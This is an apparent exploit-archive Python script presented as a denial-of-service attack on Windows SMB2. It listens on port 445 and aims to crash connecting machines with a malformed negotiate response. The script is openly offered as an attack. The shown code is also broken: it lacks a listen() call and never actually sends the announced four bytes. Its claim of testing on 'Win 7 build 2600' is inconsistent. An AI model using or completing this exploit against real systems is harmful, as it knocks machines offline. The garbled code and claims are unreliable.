Windows SMB2 Negotiate Protocol (0x72) Response DOS

# === EDIT – this exploit appears to be exactly the same one of one which was already found
# and fixed notified by Laurent Gaffié, i did not know this but his blog post can be found here:
import socket,sys,time
print "Maliformed negotiate protocol response and quickly closing the connection causes Windows machines supporting SMB2 to crash (leaves the system hanging and unresponsive) -- tested on Win 7 build 2600"
print "Written by Jelmer de Hen"
print "Published at"
smb = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
smb.bind(("", 445))
smbconn, addr = smb.accept()
print "[+] "+str(addr)+" is trying to make connection to us over port 445"
while 1:
    new_packet = smbconn.recv(1024)
    print "[+] Waiting for a negotiate request packet"
    if new_packet[8]=="r":
        print "[+] Received the negotiate request packet injecting the 4 bytes now..."
print "[+] Closing connection... This is part of the exploit"
print "[+] Done, if all went good then the box on the other side crashed"



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